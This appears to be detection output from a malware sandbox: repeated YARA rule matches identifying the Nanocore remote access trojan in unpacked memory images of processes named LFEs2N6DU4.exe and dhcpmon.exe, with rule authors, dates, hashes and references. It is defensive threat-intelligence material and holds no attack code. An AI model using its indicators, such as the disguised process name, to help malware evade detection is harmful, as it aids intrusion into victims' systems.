Source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.55d0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.55d0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.LFEs2N6DU4.exe.41c05c4.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.3c09b70.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.3be1b50.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.2.LFEs2N6DU4.exe.3141390.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.3141390.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.3141390.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.dhcpmon.exe.3bfb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.2.dhcpmon.exe.2c19698.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.dhcpmon.exe.2c19698.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.LFEs2N6DU4.exe.41c4bed.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.5654629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4199b70.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.LFEs2N6DU4.exe.3deb78e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.3be1b50.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.2.LFEs2N6DU4.exe.3141390.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.2.dhcpmon.exe.3831b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.3831b50.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 24.2.LFEs2N6DU4.exe.31d96e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.LFEs2N6DU4.exe.31d96e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.dhcpmon.exe.3c09b70.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.2dcecf4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.2dcecf4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 24.2.LFEs2N6DU4.exe.41bb78e.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.dhcpmon.exe.3c59b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.LFEs2N6DU4.exe.3509b70.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.41e9b90.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.3df4bed.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.2.LFEs2N6DU4.exe.4171b50.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.LFEs2N6DU4.exe.3df05c4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.2.dhcpmon.exe.38a9b90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
